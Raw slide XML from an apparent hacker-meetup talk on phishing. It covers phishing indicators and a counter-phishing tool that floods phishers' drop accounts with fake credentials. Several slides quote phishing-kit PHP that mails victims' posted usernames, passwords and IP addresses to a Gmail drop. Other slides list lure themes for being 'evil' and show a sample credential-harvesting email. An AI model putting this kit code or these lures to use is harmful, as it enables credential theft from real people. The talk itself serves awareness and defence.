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0"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="283" r:id="rId3"/>
    <p:sldId id="292" r:id="rId4"/>
    <p:sldId id="293" r:id="rId5"/>
    <p:sldId id="294" r:id="rId6"/>
    <p:sldId id="296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16" r:id="rId16"/>
    <p:sldId id="304" r:id="rId17"/>
    <p:sldId id="305" r:id="rId18"/>
    <p:sldId id="306" r:id="rId19"/>
    <p:sldId id="307" r:id="rId20"/>
    <p:sldId id="308" r:id="rId21"/>
    <p:sldId id="310" r:id="rId22"/>
    <p:sldId id="309" r:id="rId23"/>
    <p:sldId id="311" r:id="rId24"/>
    <p:sldId id="312" r:id="rId25"/>
    <p:sldId id="313" r:id="rId26"/>
    <p:sldId id="314" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="29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636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89442-4169-4A6E-A4ED-2D7F6720E53B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E8822-AA6B-4F9B-B3FC-55D634AC0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180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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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87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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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2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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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13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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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2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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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18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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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37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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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70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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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38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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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58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B4F14-D831-4112-9C24-2F0F4877570F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C37D-5542-4E0B-AA14-E0E229C5B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6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B4F14-D831-4112-9C24-2F0F4877570F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DC37D-5542-4E0B-AA14-E0E229C5B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teco.de/2018-06-16_1.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/LogoiLab/ActiveAntiPhish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c414.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/belouv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Let’s Talk Phishing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0800" y="3886200"/>
            <a:ext cx="6705600" cy="1752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Alex Minster “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Belouve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hacker. DC414. General Curious Bastard. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ulicbelouve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28600"/>
            <a:ext cx="2057400" cy="220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7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686800" cy="6397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Phishing Indicators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15" y="1219200"/>
            <a:ext cx="9443522" cy="52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30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686800" cy="6397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And what if YOU want to be evil?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85800" y="1524000"/>
            <a:ext cx="5029200" cy="4495798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182875" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then…just be evil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Calendar Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HR Violation &lt;- Be careful!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Salary Updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Targeted attacks…friends, family, hobbies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Home loan changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overdraft notices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Depends on target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="28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F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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y</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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524000"/>
            <a:ext cx="6100678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39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8100"/>
            <a:ext cx="9104045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41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686800" cy="6397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Try Hard 2: Try Harder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85800" y="1295400"/>
            <a:ext cx="9906000" cy="4724398"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="182875" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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From: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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it@chown.co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Subject: Update Contact Details for Company Directory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Team,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need to make sure everyone’s contact information is up-to-date, please log in with your corporate login and verify the information is correct.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http://employeedirectory.chown.co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need to have this list updated by Friday, so please make this a priority.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  <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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1490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686800" cy="6397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Learning Time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85800" y="1524000"/>
            <a:ext cx="5715000" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So what can we learn from these examples?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Cybercriminals no longer use poorly typed phishing e-mails. They’re clever.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>They do their homework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>They know a lot about the individuals they are targeting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>They often purchase quality domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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1" y="1524000"/>
            <a:ext cx="522711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91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686800" cy="6397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Just 4 U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85800" y="1524000"/>
            <a:ext cx="9372600" cy="44957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875" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I doubled the length of this presentation, just for DC414.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4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4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is the less-corporate friendly stuff.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4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4400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Yaaaay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00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78649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686800" cy="6397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Some Fresh Black Hat Tools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85800" y="1524000"/>
            <a:ext cx="9601200" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You want to screw with the phishers?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Yeah you do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Let’s go back to this picture:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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1016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686800" cy="6397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Some Fresh Black Hat Tools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85800" y="1524000"/>
            <a:ext cx="6781800" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You want to screw with the phishers?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Yeah you do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Let’s go back to this picture:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>And do the same back…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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475" y="3124200"/>
            <a:ext cx="3292125" cy="27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40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686800" cy="6397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/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ActiveAntiPhish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85800" y="1524000"/>
            <a:ext cx="9601200" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Protecting Stolen Credentials Using Saturation”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not mine.  Chad Baxter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fresh, as in 16 June 2018.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Found that hackers tend to use kits, and “tried and true format” used in about 90% of them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Just detect them?  Nah.  Hit ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> back.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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1480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686800" cy="6397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Looking At The Kits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85800" y="1524000"/>
            <a:ext cx="10363200" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishers like to tag their logs.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dunno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> why.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$message .=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"-----------  ! +Citi LOGIN !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xDD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!  -----------\n"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$message .=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"-----------  ! +Account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!  -----------\n"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$message .=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"Email Address        : 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.$_POST[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'username'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"\n"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$message .=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"Password               : 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.$_POST[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passwd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"\n"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$message .=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"IP Address             : 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.$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"\n"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$message .=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"-----------  ! +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nJoY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!  -----------\n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2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial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  <a:latin typeface="Arial"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>But it makes things very identifiable for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveAntiPhish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757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These slides will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>picture and meme-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tastic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, because we’re all a little bit ADD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disclaimer yada yada…don’t sue me, I’m just as broke as most companies’ firewalls, so you’ll be out of luck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>YOLOSEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This’ll have basic stuff, corporate stats…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And then some hacker-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tricks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And cats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3581400"/>
            <a:ext cx="2457034" cy="288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3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686800" cy="6397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Looking At The Kits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85800" y="1524000"/>
            <a:ext cx="10363200" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How the mailer looks, send to a throwaway account:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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send =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"REDACTED@gmail.com"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$subject =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"Office365 logs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xD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$headers =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"From:  El Patr0n&lt;xCoNsoLe@REDACTED.com&gt;"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$headers .= $_POST[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eMailAdd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]."\n";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$headers .=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"MIME-Version: 1.0\n"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($send, $IP);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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($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$send)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mail($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send,$subject,$message,$headers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2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial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  <a:latin typeface="Arial"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>They like the 1337SpEaK, identifiable for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveAntiPhish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869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686800" cy="6397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Theory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85800" y="1524000"/>
            <a:ext cx="10363200" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Increase the noise in the signal to noise</a:t>
            </a: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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Give it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proxy list (so they don’t come back at you)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake password list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake username list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>And then…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166740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686800" cy="6397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Saturation!!!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71600"/>
            <a:ext cx="7135780" cy="401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3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686800" cy="6397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Drinking from the firehose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85800" y="1524000"/>
            <a:ext cx="10363200" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most throwaway accounts are Gmail accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GMail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> only allows you to receive 60 e-mails per minute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These are being sent BY the phisher (remember the mailer section?)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$send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"REDACTED@gmail.com"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$subject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"Office365 logs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xD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$headers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"From:  El Patr0n&lt;xCoNsoLe@REDACTED.com&gt;"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3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50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686800" cy="6397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Drinking from the firehose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85800" y="1524000"/>
            <a:ext cx="10363200" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server sending the e-mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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headers =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"From:  El Patr0n&lt;xCoNsoLe@REDACTED.com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&gt;"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3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Gets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>banned </a:t>
            </a:r>
